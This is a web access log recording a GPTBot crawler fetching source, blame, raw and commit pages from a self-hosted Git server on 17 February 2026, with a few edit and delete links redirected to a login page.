"/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18909] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:15:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 11927] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:15:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md" [Client 74.7.227.38] [Length 11528] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" +[17/Feb/2026:15:29:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:15:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/GoldMonitor/ReadMe.md" +[17/Feb/2026:15:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10139] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20674] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 36887] [Gzip 12.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/README.md" +[17/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fjs%2fapp.js" [Client 74.7.227.38] [Length 54133] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10939] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25199] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/README.md" [Client 74.7.227.38] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:15:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:29:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10941] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr 